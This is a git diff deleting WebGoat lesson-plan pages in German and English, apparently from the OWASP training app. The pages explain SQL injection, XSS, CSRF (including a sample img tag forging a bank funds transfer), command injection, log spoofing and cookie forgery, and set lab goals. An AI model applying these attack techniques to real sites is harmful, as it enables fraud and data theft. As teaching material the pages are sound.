- - Entwickler lassen oftmals Kommentare wie FIXME's, TODO's, Code Broken, Hack usw. im Quellcode. - Durchsuchen Sie den Quellcode nach allem was für Sie nach Passwörtern, Hintertüren oder anderen Unregelmäßigkeiten aussieht. - - -
-

Grundsätzliche(s) Ziel(e):

-Sie suchen und finden Hinweise im Quellcode die es Ihnen erlauben sich anzumelden.
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/de/HttpBasics.html b/src/main/webapp/lesson_plans/de/HttpBasics.html
deleted file mode 100644
index 995912eeb..000000000
--- a/src/main/webapp/lesson_plans/de/HttpBasics.html
+++ /dev/null
@@ -1,29 +0,0 @@
-
-

Lehrplan: Http Basics

-
- -

Lehrinhalt:

- Diese Lektion stellt die Verständnis-Grundlagen für den Datentransport zwischen Browser und Webapplikation dar.
-
-

-So funktioniert HTTP: -

-Alle HTTP Transaktionen folgen demselben Schema. Jede Anfrage vom Client und jede Antwort des Servers besteht aus drei Teilen: Der Anfrage-/Antwortzeile, dem Kopf und dem Körper. -Der Client initiiert eine Transaktion wie folgt:
-
- Der Client kontaktiert den Server und sendet eine Dokumentenanfrage
-
-
-
    GET /index.html?param=value HTTP/1.0
- Als nächstes sendet der Client optionale Kopfzeilen (Header) um den Server über die Client-seitige Konfiguration und die akzeptierten Dokumentenformate zu informieren.
-
-
    User-Agent: Mozilla/4.06 Accept: image/gif,image/jpeg, */*
-Nachdem der eigentliche Anfrage (Request) und den weiteren Kopfzeilen (Header) kann der Client noch weitere Daten senden. Diese Daten werden meistens von CGI Programmen im Zusammenhang mit der POST Methode ausgewertet. -
-

Grundsätzliche(s) Ziel(e):

- -Geben Sie Ihren Namen in das Eingabefeld ein und drücken sie "Los gehts!" um die Anfrage abzuschicken. Der Server wird die Anfrage akzeptieren, Ihre Eingabedaten umdrehen, und wieder zu Ihnen zurückschicken. Dies stellt eine vollständige HTTP Transaktion dar! -

-Sie sollten mit der Benutzung von WebGoat vertraut werden. Es sollten die Knöpfe für Hinweise (Hints), für das Anzeigen von Parametern(Parameters) oder Cookies und für das Anzeigen von Java-Quellcode ausprobiert werden. -Außerdem, können Sie hier WebScarab gut ausprobieren. -
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/de/JavaScriptValidation.html b/src/main/webapp/lesson_plans/de/JavaScriptValidation.html
deleted file mode 100644
index f278bc9d9..000000000
--- a/src/main/webapp/lesson_plans/de/JavaScriptValidation.html
+++ /dev/null
@@ -1,19 +0,0 @@
-
-

Lehrplan: Client-seitige JavaScript Validierung umgehen

-
-

Konzept:

- -Client-seitige Validierung sollte nicht als eine sichere Maßnahme zur Validierung von Parametern angesehen werden. -Diese Art der Validierung kann höchstens den Server entlasten und verhindern das normale Benutzer Eingabedaten in -einem falschen Format absenden. Angreifer hingegen, können diesen Mechanismus auf verschiedene Arten umgehen. Jede -Client-seitige Validierung sollte auf der Serverseite wiederholt werden. Dies verhindert, dass unsichere Parameter -in der Applikation benutzt werden. - -
-

Grundsätzliche(s) Ziel(e):

- -Das untenstehende Formular verlangt von Ihnen verschiedene Regeln beim Ausfüllen einzuhalten. Dies wird Client-seitig -überprüft. Versuchen Sie diese -Regeln zu brechen und senden Sie Daten an die Webseite die die Webseite nicht erwartet! Sie müssen alle 7 Regeln -gleichzeitig brechen! -
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/de/LogSpoofing.html b/src/main/webapp/lesson_plans/de/LogSpoofing.html
deleted file mode 100644
index c5bbff3b0..000000000
--- a/src/main/webapp/lesson_plans/de/LogSpoofing.html
+++ /dev/null
@@ -1,17 +0,0 @@
-
-

Lehrplan: Fälschen von Einträgen in Log Dateien (Log Spoofing)

-
- -

Konzept:

-

-Log-Einträge in Log-Dateien müssen nicht immer von tatsächlichen Ereignissen stammen. Ein Angreifer kann durch Einschleusen -bestimmter Einträge das Eintreten bestimmter Ereignisse vortäuschen und dadurch den Administrator zu unnötigen bzw. voreiligen -Handlungen verleiten bzw. ihn einfach nur verwirren. -

- -

Grundsätzliche(s) Ziel(e):

- -* Der graue Bereich steht für das was tatsächlich in der Log-Datei des Webservers erscheint.
-* Ihr Ziel ist es so aussehen zu lassen, als hätte sich der Benutzer "admin" erfolgreich eingeloggt.
-* Verbessern Sie Ihren Angriff, indem Sie ein Skript (Javascript) in das Log schreiben. -
diff --git a/src/main/webapp/lesson_plans/de/PathBasedAccessControl.html b/src/main/webapp/lesson_plans/de/PathBasedAccessControl.html
deleted file mode 100644
index c7afce017..000000000
--- a/src/main/webapp/lesson_plans/de/PathBasedAccessControl.html
+++ /dev/null
@@ -1,11 +0,0 @@
-
-

Lehrplan: Umgehen eines Pfad-basierten Zugangskontrollschemas

-
-

Konzept:

- -In einem Pfad-basierten Zugangangskontrollschemas (path based access control scheme), kann ein Angreifer den Pfad "bewandern" indem -er relative Pfadangaben übergibt. Dadurch kann der Angreifer auf Dateien zugreifen, die für niemanden zugänglich sind, bzw. zu denen -der Zugang bei direkter Anfrage ansonsten abgelehnt würde. - -

Grundsätzliche(s) Ziel(e):

-Sie sollten in der Lage sein auf eine Datei zuzugreifen die sich nicht im aufgelisteten Verzeichnis befindet.
diff --git a/src/main/webapp/lesson_plans/de/ReflectedXSS.html b/src/main/webapp/lesson_plans/de/ReflectedXSS.html
deleted file mode 100644
index 60f5e0e80..000000000
--- a/src/main/webapp/lesson_plans/de/ReflectedXSS.html
+++ /dev/null
@@ -1,19 +0,0 @@
-
-

Lehrplan: Cross Site Scripting (XSS)

-
-

Konzept:

- -Jegliche Eingabedaten sollten auf der Serverseite überprüft werden. -XSS passiert wenn nicht geprüfte Benutereingaben in eine HTTP Response eingebaut werden. -Bei einem reflektierten XSS Angriff, kann ein Angreifer eine URL erzeugen die ein Angriffsskript enthält und kann diese -URL auf einer Webseite hinterlegen, sie per Email verschicken oder ein Opfer auf eine andere Weise dazu bringen die -URL zu besuchen. - - - -

General Goal(s):

- -Ihre Aufgabe ist es, sich ein Stück Javascript zu überlegen das Sie in diese Seite einbauen können. -Dann versuchen Sie die Seite dazu zu bringen, Ihnen dieses Skript wieder auszulieferen (es zu reflektieren) -so dass das Skript in Ihrem Browser ausgeführt wird. -
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/de/RemoteAdminFlaw.html b/src/main/webapp/lesson_plans/de/RemoteAdminFlaw.html
deleted file mode 100644
index dbaaeb3c3..000000000
--- a/src/main/webapp/lesson_plans/de/RemoteAdminFlaw.html
+++ /dev/null
@@ -1,16 +0,0 @@
-
-

Lehrplan: Zugang zu Web-Resourcen erzwingen

-
-

Konzept::

-Applikationen haben oftmals eine Administrationsschnittstelle, das priviligierten Benutzern Zugang zu Funktionalität ermöglicht die -für normale Benutzer nicht sichtbar ist. Der Applikationsserver selbst hat auch oft noch eine seperate Administrationsschnittstelle. - -

Grundsätzliche(s) Ziel(e): - -Versuchen Sie auf die Administrationsschnittstelle von WebGoat zuzugreifen. Sie können auch versuchen auf die Administrationsschnittstelle -von Tomcat (der Applikationsserver) zuzugreifen. Die Tomcat Schnittstelle kann über die URL /admin erreicht werden, zählt aber nicht -für das Bestehen dieser Lektion. -Wenn Sie Zugriff auf Funktionalität der Administrationsschnittstelle erlangt haben, dann kommen Sie hierher zurück um zu sehen ob Sie -die Lektion abgeschlossen haben. - -

diff --git a/src/main/webapp/lesson_plans/de/SqlNumericInjection.html b/src/main/webapp/lesson_plans/de/SqlNumericInjection.html
deleted file mode 100644
index ad9e7cc41..000000000
--- a/src/main/webapp/lesson_plans/de/SqlNumericInjection.html
+++ /dev/null
@@ -1,18 +0,0 @@
-
-

Lehrplan: Durchführung von Numeric SQL Injection

-
- -

Konzept:

-SQL Injection Angriffe stellen eine ernstzunehmende Bedrohung für alle Datenbank-getriebenen Webseiten dar. -Entsprechende Angriffe sind leicht zu lernen und der verursachte Schaden ist schwer bzw. entspricht der -Kompromittierung des kompletten Systems. -Trotz dieses Gefahrenpotentials ist eine unglaubliche Anzahl von Systemen im Internet für diese Form des Angriffs verwundbar. -Dieser Angriff ist zwar leicht durchzuführen, allerdings ist er auch mit ein wenig gesundem Menschenverstand und Vorausdenken -leicht zu verhindern. Die anerkannte Vorgehensweise zur Verhinderung dieser Angriffstypen -besteht darin alle Eingabedaten zu säubern, insbesondere die Daten die in Betriebssystembefehlen, -Skripten und Datenbankabfragen eingebaut werden. -

Grundsätzliche(s) Ziel(e):

- -Das untenstehende Formular ermöglicht es dem Benutzer Wetterdaten zu betrachten. Versuchen Sie einen SQL String einzuschleusen, der -als Resultat alle Wetterdaten anzeigt. -
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/de/SqlStringInjection.html b/src/main/webapp/lesson_plans/de/SqlStringInjection.html
deleted file mode 100644
index 0cd360db7..000000000
--- a/src/main/webapp/lesson_plans/de/SqlStringInjection.html
+++ /dev/null
@@ -1,20 +0,0 @@
-
-

Lehrplan: Durchführung von String SQL Injection

-
- -

Konzept:

- -SQL Injection Angriffe stellen eine ernstzunehmende Bedrohung für alle Datenbank-getriebenen Webseiten dar. -Entsprechende Angriffe sind leicht zu lernen und der verursachte Schaden ist schwer bzw. entspricht der -Kompromittierung des kompletten Systems. -Trotz dieses Gefahrenpotentials ist eine unglaubliche Anzahl von Systemen im Internet für diese Form des Angriffs verwundbar. -Dieser Angriff ist zwar leicht durchzuführen, allerdings ist er auch mit ein wenig gesundem Menschenverstand und Vorausdenken -leicht zu verhindern. Die anerkannte Vorgehensweise zur Verhinderung dieser Angriffstypen -besteht darin alle Eingabedaten zu säubern, insbesondere die Daten die in Betriebssystembefehlen, -Skripten und Datenbankabfragen eingebaut werden. -

Grundsätzliche(s) Ziel(e):

- -Das untenstehende Formular erlaubt es Benutzern ihre Kreditkartennummern anzuzeigen. Das können Sie -exemplarisch mit dem Benutzernamen "Smith" ausprobieren. -Versuchen Sie einen SQL String einzuschleusen, der als Resultat alle Kreditkartennummern anzeigt. -
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/de/StoredXss.html b/src/main/webapp/lesson_plans/de/StoredXss.html
deleted file mode 100644
index 74463c949..000000000
--- a/src/main/webapp/lesson_plans/de/StoredXss.html
+++ /dev/null
@@ -1,16 +0,0 @@
-
-

Lehrplan: Durchführen von Stored Cross Site Scripting (XSS)

-
-

Konzept:

- -Man sollte Eingabedaten immer säubern, besonders diese die später als parameter für Betriebssystembefehle, Skripte -und Datenbankabfragen benutzt werden. Essentiell ist das für Inhalt der irgendwo in der Applikation permanent gespeichert -wird. Benutzer sollten nicht in der Lage sein eigene Inhalte zu hinterlassen, durch die andere Nutzer ungewünschte -Seiten oder Inhalte nachladen wenn der Inhalt betrachtet wird. - - -

Grundsätzliche(s) Ziel(e):

- -Hinterlassen Sie Inhalt der den Browser eines anderen Benutzers dazu bringt eine unerwünschte -Seite bzw. Inhalt anzuzeigen. -
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/de/WeakAuthenticationCookie.html b/src/main/webapp/lesson_plans/de/WeakAuthenticationCookie.html
deleted file mode 100644
index 5475df32c..000000000
--- a/src/main/webapp/lesson_plans/de/WeakAuthenticationCookie.html
+++ /dev/null
@@ -1,22 +0,0 @@
-
-

Lehrplan: Einen Authentisierungs Cookie fa¨lschen

-
- -

Lehrinhalt:

- -Viele Webapplikationen erlauben es einem Benutzer sofort eingeloggt zu sein, sobald der Benutzer den richtigen Authentisierungs Cookie übergibt. -Manchmal kann der richtige Wert dieses Cookies geraten werden, wenn der Algorithmus zur Generierung dieser Cookies bekannt ist. -Der Cookie kann auch von dem Computer des Benutzers gestohlen werden indem andere Schwachstellen in seinem System ausgenutzt werden. -Mittels Cross Site Scripting (XSS) kann der Cookie auch abgefangen werden. -Diese Übung soll Sie auf das Thema der Authentisierungs Cookies aufmerksam machen und gibt Ihnen -die Möglichkeit die Authentisierungsmethode dieser Lektion zu überwinden. - - - -

Grundsätzliche(s) Ziel(e):

- - Es ist Ihre Aufgabe die Authentisierung zu umgehen. Melden Sie sich mit dem Benutzernamen "webgoat" und dem Passwort "webgoat" an - und schauen Sie was passiert. Sie können auch versuchen Sich mit aspect/aspect anzumelden. Wenn Sie den Authentisierungs Cookie verstehen, - versuchen Sie Ihre Identität zu "alice" zu wechseln. - -
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/AccessControlMatrix.html b/src/main/webapp/lesson_plans/en/AccessControlMatrix.html
deleted file mode 100644
index 576bf3b72..000000000
--- a/src/main/webapp/lesson_plans/en/AccessControlMatrix.html
+++ /dev/null
@@ -1,9 +0,0 @@
-
-

Lesson Plan Title: Using an Access Control Matrix

-
-

Concept / Topic To Teach:

- -In a role-based access control scheme, a role represents a set of access permissions and privileges. A user can be assigned one or more roles. A role-based access control scheme normally consists of two parts: role permission management and role assignment. A broken role-based access control scheme might allow a user to perform accesses that are not allowed by his/her assigned roles, or somehow allow privilege escalation to an unauthorized role. -

General Goal(s):

-Each user is a member of a role that is allowed to access only certain resources. Your goal is to explore the access control rules that govern this site. Only the [Admin] group should have access to the 'Account Manager' resource. -
diff --git a/src/main/webapp/lesson_plans/en/BackDoors.html b/src/main/webapp/lesson_plans/en/BackDoors.html
deleted file mode 100644
index c4ac8a08a..000000000
--- a/src/main/webapp/lesson_plans/en/BackDoors.html
+++ /dev/null
@@ -1,23 +0,0 @@
-
-

Lesson Plan Title: How to Create Database Back Door Attacks.

-
- -

Concept / Topic To Teach:

-How to Create Database Back Door Attacks. -
-
-

-How the attacks works: -

-Databases are used usually as a backend for web applications. Also it is used as a media of storage. It can also -be used as a place to store a malicious activity such as a trigger. A trigger is called by the database management -system upon the execution of another database operation like insert, select, update or delete. An attacker for example -can create a trigger that would set his email address instead of every new user's email address. -
-

General Goal(s):

- -* Your goal should be to learn how you can exploit a vulnerable query to create a trigger.
-* You will not be able to actually create one in this lesson because the underlying database engine used with WebGoat doesn't support triggers.
-* Your login ID is 101. - -
diff --git a/src/main/webapp/lesson_plans/en/BasicAuthentication.html b/src/main/webapp/lesson_plans/en/BasicAuthentication.html
deleted file mode 100644
index 73a3c736d..000000000
--- a/src/main/webapp/lesson_plans/en/BasicAuthentication.html
+++ /dev/null
@@ -1,9 +0,0 @@
-
-

Lesson Plan Title: Basic Authentication

-
-

Concept / Topic To Teach:

- -Basic Authentication is used to protect server side resources. The web server will send a 401 authentication request with the response for the requested resource. The client side browser will then prompt the user for a user name and password using a browser supplied dialog box. The browser will base64 encode the user name and password and send those credentials back to the web server. The web server will then validate the credentials and return the requested resource if the credentials are correct. These credentials are automatically resent for each page protected with this mechanism without requiring the user to enter their credentials again.
-

General Goal(s):

-For this lesson, your goal is to understand Basic Authentication and answer the questions below. -
diff --git a/src/main/webapp/lesson_plans/en/BlindSqlInjection.html b/src/main/webapp/lesson_plans/en/BlindSqlInjection.html
deleted file mode 100644
index 0ff76e32e..000000000
--- a/src/main/webapp/lesson_plans/en/BlindSqlInjection.html
+++ /dev/null
@@ -1,15 +0,0 @@
-
-

Lesson Plan Title: How to Perform Blind SQL Injection

-
- -

Concept / Topic To Teach:

- -SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks an incredible number of systems on the internet are susceptible to this form of attack. -
-Not only is it a threat easily instigated, it is also a threat that, with a little common-sense and forethought, can be almost totally prevented. This lesson will show the student several examples of SQL injection.
-
-It is always good practice to sanitize all input data, especially data that will used in OS command, scripts, and database queries.
- - -

General Goal(s):

-The form below allows a user to enter an account number and determine if it is valid or not. Use this form to develop a true / false test check other entries in the database.

Reference Ascii Values: 'A' = 65 'Z' = 90 'a' = 97 'z' = 122

The goal is to find the value of the first_name in table user_data for userid 15613. Put that name in the form to pass the lesson. diff --git a/src/main/webapp/lesson_plans/en/BufferOverflow.html b/src/main/webapp/lesson_plans/en/BufferOverflow.html deleted file mode 100644 index b25b4f944..000000000 --- a/src/main/webapp/lesson_plans/en/BufferOverflow.html +++ /dev/null @@ -1,9 +0,0 @@ -
-

Lesson Plan Title: How to Exploit Buffer Overflows

-
- -

Concept / Topic To Teach:

-How to Exploit Buffer Overflows. -

General Goal(s):

-This lesson needs a creator! - \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/en/CSRF.html b/src/main/webapp/lesson_plans/en/CSRF.html deleted file mode 100644 index 594d049bd..000000000 --- a/src/main/webapp/lesson_plans/en/CSRF.html +++ /dev/null @@ -1,26 +0,0 @@ -
-

Lesson Plan Title: How to Perform Cross Site Request Forgery.

-
- -

Concept / Topic To Teach:

- This lesson teaches how to perform Cross Site Request Forgery (CSRF) attacks. -
-
-

-How the attacks works: -

-Cross-Site Request Forgery (CSRF/XSRF) is an attack that tricks the victim into loading a page that contains img links like the one below: - -
<img src="http://www.mybank.com/sendFunds.do?acctId=123456"/>
- -When the victim's browser attempts to render this page, it will issue a request to www.mybank.com to the transferFunds.do page with the specified parameters. The browser will think the link is to get an image, even though it actually is a funds transfer function. - -The request will include any cookies associated with the site. Therefore, if the user has authenticated to the site, and has either a permanent cookie or even a current session cookie, the site will have no way to distinguish this from a legitimate user request. - -In this way, the attacker can make the victim perform actions that they didn't intend to, such as logout, purchase item, or any other function provided by the vulnerable website -
-

General Goal(s):

- -Your goal is to send an email to a newsgroup that contains an image whose URL is pointing to a malicious request. Try to include a 1x1 pixel image that includes a URL. The URL should point to the CSRF lesson with an extra parameter "transferFunds=4000". You can copy the shortcut from the left hand menu by right clicking on the left hand menu and choosing copy shortcut. Whoever receives this email and happens to be authenticated at that time will have his funds transferred. When you think the attack is successful, refresh the page and you will find the green check on the left hand side menu.
Note that the "Screen" and "menu" GET variables will vary between WebGoat builds. Copying the menu link on the left will give you the current values. - - diff --git a/src/main/webapp/lesson_plans/en/ChallengeScreen.html b/src/main/webapp/lesson_plans/en/ChallengeScreen.html deleted file mode 100644 index b3d9b3321..000000000 --- a/src/main/webapp/lesson_plans/en/ChallengeScreen.html +++ /dev/null @@ -1,7 +0,0 @@ -
-

Lesson Plan Title: Putting it all together

-

-

Concept / Topic To Teach:

-This lesson creates a challenge that will help the student apply all that they have learned.
-General Goal(s):
-Display the secret message. \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/en/ClientSideFiltering.html b/src/main/webapp/lesson_plans/en/ClientSideFiltering.html deleted file mode 100644 index 608c360e5..000000000 --- a/src/main/webapp/lesson_plans/en/ClientSideFiltering.html +++ /dev/null @@ -1,12 +0,0 @@ -
-

Lesson Plan Title: Client Side Filtering

-
-

Concept / Topic To Teach:

- -It is always a good practice to send to the client only information which they are supposed -to have access to. In this lesson, too much information is being sent to the client, creating -a serious access control problem. - -

General Goal(s):

-For this exercise, your mission is exploit the extraneous information being returned by the -server to discover information to which you should not have access. \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/en/ClientSideValidation.html b/src/main/webapp/lesson_plans/en/ClientSideValidation.html deleted file mode 100644 index e712b6fb7..000000000 --- a/src/main/webapp/lesson_plans/en/ClientSideValidation.html +++ /dev/null @@ -1,15 +0,0 @@ -
-

Lesson Plan Title: Insecure Client Storage

-
-

Concept / Topic To Teach:

- -It is always a good practice to validate all input on the server side. Leaving the -mechanism for validation on the client side leaves it vulnerable to reverse -engineering. Remember, anything on the client side should not be -considered a secret. - -

General Goal(s):

-For this exercise, your mission is to discover a coupon code to receive an unintended -discount. Then, exploit the use of client side validation to submit an order with a -cost of zero. - diff --git a/src/main/webapp/lesson_plans/en/CommandInjection.html b/src/main/webapp/lesson_plans/en/CommandInjection.html deleted file mode 100644 index 1db97ab80..000000000 --- a/src/main/webapp/lesson_plans/en/CommandInjection.html +++ /dev/null @@ -1,12 +0,0 @@ -
-

Lesson Plan Title: How to Perform Command Injection

-
-

Concept / Topic To Teach:

- -Command  injection attacks represent a serious threat to any parameter-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks an incredible number of systems on the internet are susceptible to this form of attack.
-Not only is it a threat easily instigated, it is also a threat that, with a little common-sense and forethought, can be almost totally prevented. This lesson will show the student several examples of parameter injection.
-It is always good practice to sanitize all input data, especially data that will used in OS command, scripts, and database queries.
-Try to inject a command to the operating system. - -

General Goal(s):

-The user should be able to execute any command on the hosting OS. \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/en/ConcurrencyCart.html b/src/main/webapp/lesson_plans/en/ConcurrencyCart.html deleted file mode 100644 index 4a2f44b75..000000000 --- a/src/main/webapp/lesson_plans/en/ConcurrencyCart.html +++ /dev/null @@ -1,22 +0,0 @@ - - - - - - Lesson Plan - - - -
-

Lesson Plan Title: Shopping Cart Concurrency Flaw

-
- -

Concept / Topic To Teach:

- - Web applications can handle many HTTP requests simultaneously. Developers often use variables that are not thread safe.  Thread safety means that the fields of an object or class always maintain a valid state when used concurrently by multiple threads. It is often possible to exploit a concurrency bug by loading the same page as another user at the exact same time. Because all threads share the same method area, and the method area is where all class variables are stored, multiple threads can attempt to use the same class variables concurrently.
- -

General Goal(s):

-For this exercise, your mission is to exploit the concurrency issue which will allow you to purchase merchandise for a lower price. -
- - diff --git a/src/main/webapp/lesson_plans/en/CrossSiteScripting.html b/src/main/webapp/lesson_plans/en/CrossSiteScripting.html deleted file mode 100644 index 1d2848f3c..000000000 --- a/src/main/webapp/lesson_plans/en/CrossSiteScripting.html +++ /dev/null @@ -1,12 +0,0 @@ -
-

Lesson Plan Title: How to Perform Cross Site Scripting (XSS)

-
-

Concept / Topic To Teach:

- -It is always a good practice to scrub all inputs, especially those inputs that will later be used as parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere. Users should not be able to create message content that could cause another user to load an undesirable page or undesirable content when the user's message is retrieved.
-XSS can also occur when unvalidated user input is used in an HTTP response. In a reflected XSS attack, an attacker can craft a URL with the attack script and post it to another website, email it, or otherwise get a victim to click on it. - -

General Goal(s):

-For this exercise, you will perform stored and reflected XSS attacks. You will also implement code changes in the web application to defeat these attacks. -
- diff --git a/src/main/webapp/lesson_plans/en/CsrfPromptByPass.html b/src/main/webapp/lesson_plans/en/CsrfPromptByPass.html deleted file mode 100644 index 7a505f2ac..000000000 --- a/src/main/webapp/lesson_plans/en/CsrfPromptByPass.html +++ /dev/null @@ -1,33 +0,0 @@ -
-

Lesson Plan Title:CSRF User Prompt By-Pass


-
- -

Concept / Topic To Teach:

-This lesson teaches how to perform CSRF attacks that by-pass user confirmation prompts. -
-
-

-How the attacks works: -

-Cross-Site Request Forgery (CSRF/XSRF) is an attack that tricks the victim into loading a page -that contains a 'forged request' to execute commands with the victim's credentials. Prompting -a user to confirm or cancel the command might sound like a solution, but can be by-passed if -the prompt is scriptable. This lesson shows how to by-pass such a prompt by issuing another -forged request. This can also apply to a series of prompts such as a wizard or issuing multiple -unrelated forged requests.

- - -
-

General Goal(s):

- -Similar to the CSRF Lesson, your goal is to send an email to a newsgroup that contains multiple -malicious requests: the first to transfer funds, and the second a request to confirm the prompt -that the first request triggered. The URL should point to the CSRF lesson with an extra -parameter "transferFunds=4000", and "transferFunds=CONFIRM". You can copy the shortcut from the -left hand menu by right clicking on the left hand menu and choosing copy shortcut. Whoever -receives this email and happens to be authenticated at that time will have his funds transferred. -When you think the attack is successful, refresh the page and you will find the green check on -the left hand side menu.
-Note that the "Screen" and "menu" GET variables will vary between WebGoat builds. Copying the menu link on the left will give you the current values. - - diff --git a/src/main/webapp/lesson_plans/en/CsrfTokenByPass.html b/src/main/webapp/lesson_plans/en/CsrfTokenByPass.html deleted file mode 100644 index b57ea6b83..000000000 --- a/src/main/webapp/lesson_plans/en/CsrfTokenByPass.html +++ /dev/null @@ -1,38 +0,0 @@ -
-

Lesson Plan Title:CSRF Token Prompt By-Pass


-
- -

Concept / Topic To Teach:

-This lesson teaches how to perform CSRF attacks on sites that use tokens to mitigate CSRF attacks, but are vulnerable to CSS attacks. -
-
-

-How the attacks works: -

-

-Cross-Site Request Forgery (CSRF/XSRF) is an attack that tricks the victim into -loading a page that contains a 'forged request' to execute commands with the -victim's credentials.

- -

Token-based request authentication mitigates these attacks. This technique -inserts tokens into pages that issue requests. These tokens are required to -complete a request, and help verify that requests are not scripted. CSRFGuard from OWASP uses -this technique to help prevent CSRF attacks.

- -

However, this technique can be by-passed if CSS vulnerabilities exist on the same site. -Because of the same-origin browser policy, pages from the same domain can read content from -other pages from the same domain.

- -
-

General Goal(s):

- -Similar to the CSRF Lesson, your goal is to send an email to a newsgroup that contains a malicious -request to transfer funds. To successfully complete you need to obtain a valid request token. -The page that presents the transfer funds form contains a valid request token. The URL for the -transfer funds page is the same as this lesson with an extra parameter "transferFunds=main". Load -this page, read the token and append the token in a forged request to transferFunds. When you think -the attack is successful, refresh the page and you will find the green check on the left hand side menu.
-Note that the "Screen" and "menu" GET variables will vary between WebGoat builds. Copying the menu link on the left will give you the current values. - - - diff --git a/src/main/webapp/lesson_plans/en/DBCrossSiteScripting.html b/src/main/webapp/lesson_plans/en/DBCrossSiteScripting.html deleted file mode 100644 index a54fd9ab9..000000000 --- a/src/main/webapp/lesson_plans/en/DBCrossSiteScripting.html +++ /dev/null @@ -1,24 +0,0 @@ -
-

Lesson Plan Title: How to Perform Cross Site Scripting -(XSS)

-
-

Concept / Topic To Teach:

- -It is always a good practice to scrub all inputs, especially those -inputs that will later be used as parameters to OS commands, scripts, -and database queries. It is particularly important for content that will -be permanently stored somewhere. Users should not be able to create -message content that could cause another user to load an undesirable -page or undesirable content when the user's message is retrieved. -
-XSS can also occur when unvalidated user input is used in an HTTP -response. In a reflected XSS attack, an attacker can craft a URL with -the attack script and post it to another website, email it, or otherwise -get a victim to click on it. - -

General Goal(s):

-For this exercise, you will perform a stored XSS attack. -You will also implement code changes in the database to defeat -these attacks. -
- diff --git a/src/main/webapp/lesson_plans/en/DBSQLInjection.html b/src/main/webapp/lesson_plans/en/DBSQLInjection.html deleted file mode 100644 index 879a1b92e..000000000 --- a/src/main/webapp/lesson_plans/en/DBSQLInjection.html +++ /dev/null @@ -1,16 +0,0 @@ -
-

Lesson Plan Title: How to Perform SQL Injection

-
-

Concept / Topic To Teach:

- -It is always a good practice to scrub all inputs, especially those -inputs that will later be used as parameters to OS commands, scripts, -and database queries. Users should not be able to alter the intent of -commands that are executed on the server, in many cases as a privileged user. - -

General Goal(s):

-For this exercise, you will perform a SQL Injection attack. -You will also implement code changes in the database to defeat -these attacks. -
- diff --git a/src/main/webapp/lesson_plans/en/DOMInjection.html b/src/main/webapp/lesson_plans/en/DOMInjection.html deleted file mode 100644 index 19c19ee0b..000000000 --- a/src/main/webapp/lesson_plans/en/DOMInjection.html +++ /dev/null @@ -1,23 +0,0 @@ -
-

Lesson Plan Title: How to Perform DOM Injection Attack.

-
- -

Concept / Topic To Teach:

-How to perform DOM injection attacks. -
-
-

-How the attacks works: -

-Some applications specially the ones that uses AJAX manipulates and updates the DOM -directly using javascript, DHTML and eval() method.
-An attacker may take advantage of that by intercepting the reply and try to inject some -javascript commands to exploit his attacks. -
-

General Goal(s):

- -* Your victim is a system that takes an activation key to allow you to use it.
-* Your goal should be to try to get to enable the activate button.
-* Take some time to see the HTML source in order to understand how the key validation process works.
- - diff --git a/src/main/webapp/lesson_plans/en/DOMXSS.html b/src/main/webapp/lesson_plans/en/DOMXSS.html deleted file mode 100644 index fb7008727..000000000 --- a/src/main/webapp/lesson_plans/en/DOMXSS.html +++ /dev/null @@ -1,15 +0,0 @@ -
-

Lesson Plan Title: DOM Based Cross Site Scripting (XSS)

-
-

Concept / Topic To Teach:

- -The Document Object Model (DOM) presents an interesting problem from -a security standpoint. It allows the content of a web page to be dynamically -modified, but that can be abused by attackers during a malicious code injection. XSS, -a type of malicious code injection, can occur when unvalidated user input is used directly -to modify the content of a page on the client side. - -

General Goal(s):

-For this exercise, your mission is to use this vulnerability to inject -malicious code into the DOM. Then in the last stage, you will correct -the flaws in the code to address the vulnerability. \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/en/DOS_Login.html b/src/main/webapp/lesson_plans/en/DOS_Login.html deleted file mode 100644 index 941a89b49..000000000 --- a/src/main/webapp/lesson_plans/en/DOS_Login.html +++ /dev/null @@ -1,9 +0,0 @@ -
-

Lesson Plan Title: Denial of Service from Multiple Logins

-
-

Concept / Topic To Teach:

- -Denial of service attacks are a major issue in web applications. If the end user cannot conduct business or perform the service offered by the web application, then both time and money is wasted. -

General Goal(s):

-This site allows a user to login multiple times. This site has a database connection pool that allows 2 connections. You must obtain a list of valid users and create a total of 3 logins. - \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/en/DangerousEval.html b/src/main/webapp/lesson_plans/en/DangerousEval.html deleted file mode 100644 index f6190530c..000000000 --- a/src/main/webapp/lesson_plans/en/DangerousEval.html +++ /dev/null @@ -1,14 +0,0 @@ -
-

Lesson Plan Title: Dangerous Use of Eval

-
-

Concept / Topic To Teach:

- -It is always a good practice to validate all input on the server side. XSS can occur -when unvalidated user input is reflected directly into an HTTP response. In this lesson, unvalidated -user-supplied data is used in conjunction with a Javascript eval() call. In a reflected -XSS attack, an attacker can craft a URL with the attack script and store it on another -website, email it, or otherwise trick a victim into clicking on it. - -

General Goal(s):

-For this exercise, your mission is to come up with some input which, when run through eval, -will execute a malicious script. In order to pass this lesson, you must 'alert()' document.cookie. \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/en/Encoding.html b/src/main/webapp/lesson_plans/en/Encoding.html deleted file mode 100644 index fcba2ddac..000000000 --- a/src/main/webapp/lesson_plans/en/Encoding.html +++ /dev/null @@ -1,9 +0,0 @@ -
-

Lesson Plan Title: How to Peform Basic Encoding

-
-

Concept / Topic To Teach:

- -Different encoding schemes can be used in web applications for different reasons. - -

General Goal(s):

